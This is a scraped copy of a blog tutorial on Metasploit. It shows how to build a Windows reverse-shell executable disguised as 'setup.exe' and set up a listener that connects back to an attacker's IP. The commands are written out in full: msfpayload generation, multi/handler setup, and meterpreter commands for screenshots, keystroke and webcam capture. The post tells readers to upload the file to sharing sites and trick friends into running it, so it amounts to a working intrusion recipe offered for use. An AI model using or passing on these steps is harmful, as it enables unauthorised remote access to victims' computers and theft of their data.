Create your Own Payload to Hack windows Os using Metasploit ... [PDF]

23 May 2014 - metasploit. Yesterday i posted Exploiting Windows Os using java signed applet code execution to exploiting

3 downloads 27 Views 484KB Size

Recommend Stories


Create Your Own Dystopia
Every block of stone has a statue inside it and it is the task of the sculptor to discover it. Mich

Create Your Own Smoothie
I want to sing like the birds sing, not worrying about who hears or what they think. Rumi

Create your own neural network!
Stop acting so small. You are the universe in ecstatic motion. Rumi

Create Your Own Custom Flag!
If your life's work can be accomplished in your lifetime, you're not thinking big enough. Wes Jacks

HOWTO Create Your Own Distribution
Be who you needed when you were younger. Anonymous

Create your own diary using the Collins Spec Builder
Don't fear change. The surprise is the only way to new discoveries. Be playful! Gordana Biernat

Create your own quit-smoking plan
Happiness doesn't result from what we get, but from what we give. Ben Carson

Create Your Own Home Made Soap
Ask yourself: Where am I making my life more complicated or difficult than it has to be? Next

1_BT-Create Your Own Future.pdf - Work for yourself in your own [PDF]
Page 10. Step On Your Own Accelerator. If you are like me, you are impatient about getting results. Once you have decided to do something new or different, ...... You free yourself from the Law of Accident by living your life by design. Instead of th

How To Create Your Own Workable, Profitable Price Book
Make yourself a priority once in a while. It's not selfish. It's necessary. Anonymous

Idea Transcript


Report this ad

LINUX DIGEST A Linux Engineer and InfoSec Researcher Blog

Create your Own Payload to Hack windows Os using Metasploit. Filed under: ETHICAL HACKING, KALI LINUX — Leave a comment May 23, 2014

Yesterday i posted Exploiting Windows Os using java signed applet code execution to exploiting a windows vulnerability to logging into the system with out username and password using Metasploit. Today we going to create our own payload in an executable binary to hack windows os. let’s look at how to create stand-alone Metasploit binary payloads with msfpayload. For starters, we’ll create a simple reverse shell that connects back to the attacker and spawns a command shell. We’ll use msfpayload and windows/shell_reverse_tcp. But first, let’s look at the available options for the shell_reverse_tcp payload using the O flag. #msfpayload windows/shell_reverse_tcp O

Now let’s run msfpayload again and provide the options needed to create this payload in the Windows Portable Executable (PE) format. To do so, we provide the X option as shown at as our output format. #msfpayload windows/shell_reverse_tcp LHOST=192.168.31.20 LPORT=666 X > /home/sathish/setup.exe

Check the executable file is present in the following path #file /home/sathish/setup.exe

Now, you need to upload this file, which in this case is setup.exe, to any file uploading and sharing site such as MediaFire or 4shared and then tell this download link of your file to your friends and let them download it Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse connections. #msfconsole

#msf > use exploit/multi/handler #msf exploit(handler) > show options #msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp #msf exploit(handler) > set LHOST 192.168.31.20 #msf exploit(handler) > set LPORT 666 We first use the multi/handler module at and get a quick display of the options at . Then, we set our payload to be a Windows reverse shell at so that it matches the behavior of the executable we created earlier, tell it the IP at and the port to listen on at , and we’re ready to go. #msf exploit(handler) > exploit

Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer. Then this will create a channel and you can access the Windows and Now you will see that you access to the C drive of the victims computer, basically the drive on which the OS is installed on. So if you want then type sysinfo to get the system information about the victims computer. #meterpreter > sysinfo #meterpreter > screenshot

It will the screenshot of current window desktop.There are also other meterpreter commands like record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.

One more thing that this all thing are happen only when firewall and Antivirus is disabled in victims computer. This tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine.

Report this ad

Report this ad Tags: Ethical Hacking, exe, executable binary, Hacking, Kali Linux 1.0.6, metasploit framework, msfconsole, payload, windows os

Blog at WordPress.com.

Comments RSS (Really Simple Syndication) feed

Smile Life

When life gives you a hundred reasons to cry, show life that you have a thousand reasons to smile

Get in touch

© Copyright 2015 - 2024 PDFFOX.COM - All rights reserved.